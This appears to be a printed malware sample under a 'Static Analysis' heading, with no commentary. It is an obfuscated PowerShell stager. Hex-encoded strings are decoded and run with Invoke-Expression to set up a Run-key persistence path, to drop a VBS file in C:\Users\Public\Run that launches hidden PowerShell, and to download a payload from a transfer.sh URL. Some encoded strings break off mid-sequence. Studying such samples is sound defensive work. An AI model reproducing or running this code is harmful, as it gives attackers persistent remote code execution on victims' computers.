Static Analysis

$aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:22:-:2c:-:22:-:65:-:72:-:73:-:5c:-:50:-:75:-:62:-:6c:-:22:-:29:-:0a:-:24:-:59:-:47:-:55:-:59:-:47:-:4e:-:55:-:48:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:22:-:2c

$bb = $aa -split ':-:' |ForEach-Object {[char][byte]"0x$_"}

$cc = $bb -join ''

Invoke-Expression $cc

start-sleep -s 7

$Content = @'

Set H = CreateObject("WScript.She"&"ll")

H1 = "POwerSheLL "

H2 = "$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/Lg5XqL/ServerH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-

H.Run(H1+H2+""),0,True

Set H = Nothing

Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Content

start-sleep -s 7

$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/Lg5XqL/ServerH-Htxt'.Replace('H-H','.');

$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a:-:4d:-:4b:-:44:-:45:-:46:-:47:-:48:-:4a:-:20:-:3d:-:20:-:27:-:6e:-:45:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:45:-:62:-:43:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:54:-:27:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:27:-:2c:-:27:-:74:-:2e:-:57:-:27:-:29:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:27:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:2b:-:27:-:2c:-:27:-:6c:-:49:-:45:-:4e:-:27:-:29:-:3b:-:0a:-:24:-:53:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4e:-:4a:-:58:-:44:-:43:-:46:-:56:-:47:-:42:-:48:-:4a:-:4b:-:20:-:3d:-:20:-:27:-:44:-:4f:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:2a:-:61:-:44:-:53:-:54:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3c:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:3e:-:47:-:27:-:2e:-:52:-:6

$BBBBBBBBBBBBBBBBBB = $HHHHHHHHHHHHHHHHHH -split ':-:' |ForEach-Object {[char][byte]"0x$_"}

$HHHHHHHHHHHBBBBBBBBBAAAAAAAARRRRRRRRR = $BBBBBBBBBBBBBBBBBB -join ''

Invoke-Expression $HHHHHHHHHHHBBBBBBBBBAAAAAAAARRRRRRRRR